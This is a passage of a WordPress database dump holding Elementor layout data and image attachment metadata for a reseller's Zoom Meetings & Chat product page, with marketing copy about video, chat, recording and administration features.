need<\\/h3><p>Enable internal and external communications, all-hands meetings, and trainings through one communications platform.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"271c26e\",\"elType\":\"section\",\"settings\":{\"structure\":\"34\"},\"elements\":[{\"id\":\"0de1e6a\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"36cf127\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"4380a60\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/VnyitUU4DUY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"64592eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e0b58c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"47f78d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"17\",\"bottom\":\"17\",\"left\":\"17\",\"isLinked\":true}},\"elements\":[{\"id\":\"6f1fa59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Built for modern teams<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"12b7ed2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f4f4f4\"},\"elements\":[{\"id\":\"0b0d4db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a2a9787\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>HD video and audio<\\/strong><br \\/>Bring HD video and audio to your meetings with support for up to 1000 video participants and 49 videos on screen.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5385446\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Recording and transcripts<\\/strong><br \\/>Record your meetings locally or to the cloud, with searchable transcripts.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"092d8ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3635010\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Built-in collaboration tools<\\/strong><br \\/>Multiple participants can share their screens simultaneously and co-annotate for a more interactive meeting.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c12b178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Streamlined calendaring<\\/strong><br \\/>Support scheduling or starting meetings from Outlook, Gmail, or iCal.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89047f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"542b778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Meet securely<\\/strong><br \\/>End-to-end encryption for all meetings, role-based user security, password protection, waiting rooms, and place attendee on hold.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"adfcbe7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Team Chat<\\/strong><br \\/>Chat with groups, searchable history, integrated file sharing, and 10 year archive. Easily escalate into 1:1 or group calls.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbd652f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a6e774\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7548aa4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modernize your meeting solution<\\/h3><p>Zoom Meetings for desktop and mobile provides the tools to make every meeting a great one.<\\/p><ul><li>Focus on your meeting \\u2013 click record to leave the note taking to Zoom\\u2019s auto-generated, searchable transcripts<\\/li><li>Share and play videos with full audio and video transmit without uploading the content<\\/li><li>Look meeting-ready with Virtual Backgrounds and Touch Up My Appearance<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eb82e80\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f15a247\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/zoom.png\",\"id\":3059}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a81732\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d1960a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28ec46d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/animatedGIF-mobilemeeting_ab06f03.gif\",\"id\":3060},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3f091ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1aa57e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>A thoughtful approach to mobile meetings<\\/h3><p>Today\\u2019s mobile professionals need to be able to work and video conference wherever they are. Zoom Meetings for mobile provides the same great experience that you\\u2019d expect from the desktop client and more.<\\/p><ul><li>Turn on Virtual Backgrounds and select the image of your choice (iPhone 8+ required)<\\/li><li>Share your screen and co-annotate<\\/li><li>Use Safe Driving Mode or Apple Carplay (iPhone only)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"723d9eb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8b8a582\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"9f8ba89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Zoom Chat<\\/h3><p>Integrated persistent messaging streamlines workspace collaboration across the desktop and mobile clients.<\\/p><ul><li>Create private or public groups<\\/li><li>Share files and search content<\\/li><li>Seamlessly start a meeting<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a647de6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcfdcca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/img-zoomchat_29cb256.jpg\",\"id\":3061}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"61164d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"bea2aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1a68ea5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/img-administration_9287dae.png\",\"id\":3062},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1a5813a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"53e2945\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Administration and remote assistance made easy<\\/h3><p>Centralized IT management and remote assistance simplifies deployment and support.<\\/p><ul><li>Track utilization and usage trends<\\/li><li>View version distribution<\\/li><li>Assign granular permission settings (account, group, and user level)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ef0b21\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"73fa491\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d1c0485\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6225,3058,'_wp_page_template','template-fullwidth.php'),(6226,3058,'_elementor_edit_mode','builder'),(6227,3058,'_elementor_template_type','post'),(6228,3058,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6229,3058,'_elementor_data','[{\"id\":\"417e0ba\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f0ea6b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7770038\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom Meetings &amp; Chat<\\/h2><h4>Enterprise video conferencing with real-time messaging and content sharing<\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b91aee7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f471498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ce0af90\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simplified video conferencing and messaging across any device<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f628137\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"797a5c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62dcd05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Unparalleled usability<\\/h3><p>Enable quick adoption with meeting capabilities that make it easy to start, join, and collaborate across any device.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f241128\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362c434\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Join anywhere, on any device<\\/h3><p>Zoom Meetings syncs with your calendar system and delivers streamlined enterprise-grade video conferencing from desktop and mobile.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bde0386\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1c1fd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Video for every need<\\/h3><p>Enable internal and external communications, all-hands meetings, and trainings through one communications platform.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e0b58c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"47f78d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6f1fa59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Built for modern teams<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"12b7ed2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f4f4f4\"},\"elements\":[{\"id\":\"0b0d4db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a2a9787\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>HD video and audio<\\/strong><br \\/>Bring HD video and audio to your meetings with support for up to 1000 video participants and 49 videos on screen.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5385446\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Recording and transcripts<\\/strong><br \\/>Record your meetings locally or to the cloud, with searchable transcripts.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"092d8ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3635010\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Built-in collaboration tools<\\/strong><br \\/>Multiple participants can share their screens simultaneously and co-annotate for a more interactive meeting.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c12b178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Streamlined calendaring<\\/strong><br \\/>Support scheduling or starting meetings from Outlook, Gmail, or iCal.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89047f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"542b778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Meet securely<\\/strong><br \\/>End-to-end encryption for all meetings, role-based user security, password protection, waiting rooms, and place attendee on hold.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"adfcbe7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Team Chat<\\/strong><br \\/>Chat with groups, searchable history, integrated file sharing, and 10 year archive. Easily escalate into 1:1 or group calls.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6232,3059,'_wp_attached_file','2019/03/zoom.png'),(6233,3059,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:847;s:6:\"height\";i:499;s:4:\"file\";s:16:\"2019/03/zoom.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"zoom-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"zoom-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"zoom-768x452.png\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:16:\"zoom-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:16:\"zoom-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:16:\"zoom-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:14:\"zoom-20x12.png\";s:5:\"width\";i:20;s:6:\"height\";i:12;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6231,3056,'_elementor_version','0.4'),(6234,3059,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:1114558;s:10:\"size_after\";i:1114558;s:4:\"time\";d:0.91000000000000003108624468950438313186168670654296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:37283;s:10:\"size_after\";i:37283;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:77707;s:10:\"size_after\";i:77707;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:413987;s:10:\"size_after\";i:413987;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:72434;s:10:\"size_after\";i:72434;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:191734;s:10:\"size_after\";i:191734;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:321413;s:10:\"size_after\";i:321413;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}}}'),(6235,3060,'_wp_attached_file','2019/03/animatedGIF-mobilemeeting_ab06f03.gif'),(6236,3060,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:578;s:6:\"height\";i:780;s:4:\"file\";s:45:\"2019/03/animatedGIF-mobilemeeting_ab06f03.gif\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"animatedGIF-mobilemeeting_ab06f03-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"animatedGIF-mobilemeeting_ab06f03-222x300.gif\";s:5:\"width\";i:222;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/gif\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:45:\"animatedGIF-mobilemeeting_ab06f03-300x150.gif\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:45:\"animatedGIF-mobilemeeting_ab06f03-480x300.gif\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/gif\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:45:\"animatedGIF-mobilemeeting_ab06f03-578x400.gif\";s:5:\"width\";i:578;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/gif\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:43:\"animatedGIF-mobilemeeting_ab06f03-15x20.gif\";s:5:\"width\";i:15;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6237,3060,'wp-smush-animated','1'),(6238,3060,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.11891891891891892552024501128471456468105316162109375;s:5:\"bytes\";i:99;s:11:\"size_before\";i:83250;s:10:\"size_after\";i:83151;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:6482;s:10:\"size_after\";i:6482;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.58999999999999996891375531049561686813831329345703125;s:5:\"bytes\";i:71;s:11:\"size_before\";i:12098;s:10:\"size_after\";i:12027;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:8916;s:10:\"size_after\";i:8916;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.040000000000000000832667268468867405317723751068115234375;s:5:\"bytes\";i:9;s:11:\"size_before\";i:24938;s:10:\"size_after\";i:24929;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.059999999999999997779553950749686919152736663818359375;s:5:\"bytes\";i:19;s:11:\"size_before\";i:30816;s:10:\"size_after\";i:30797;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(6239,3061,'_wp_attached_file','2019/03/img-zoomchat_29cb256.jpg'),(6240,3061,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:828;s:6:\"height\";i:571;s:4:\"file\";s:32:\"2019/03/img-zoomchat_29cb256.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"img-zoomchat_29cb256-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"img-zoomchat_29cb256-300x207.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"img-zoomchat_29cb256-768x530.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"img-zoomchat_29cb256-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"img-zoomchat_29cb256-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:32:\"img-zoomchat_29cb256-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"img-zoomchat_29cb256-20x14.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(6241,3061,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.37524257777855840600977899157442152500152587890625;s:5:\"bytes\";i:8399;s:11:\"size_before\";i:113881;s:10:\"size_after\";i:105482;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.70999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:329;s:11:\"size_before\";i:5763;s:10:\"size_after\";i:5434;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.86000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:601;s:11:\"size_before\";i:10257;s:10:\"size_after\";i:9656;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:3396;s:11:\"size_before\";i:39634;s:10:\"size_after\";i:36238;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:547;s:11:\"size_before\";i:9055;s:10:\"size_after\";i:8508;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.37999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:1445;s:11:\"size_before\";i:19571;s:10:\"size_after\";i:18126;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.03000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:2081;s:11:\"size_before\";i:29601;s:10:\"size_after\";i:27520;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(6242,3062,'_wp_attached_file','2019/03/img-administration_9287dae.png'),(6243,3062,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:562;s:6:\"height\";i:421;s:4:\"file\";s:38:\"2019/03/img-administration_9287dae.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"img-administration_9287dae-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"img-administration_9287dae-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:38:\"img-administration_9287dae-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:38:\"img-administration_9287dae-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:38:\"img-administration_9287dae-562x400.png\";s:5:\"width\";i:56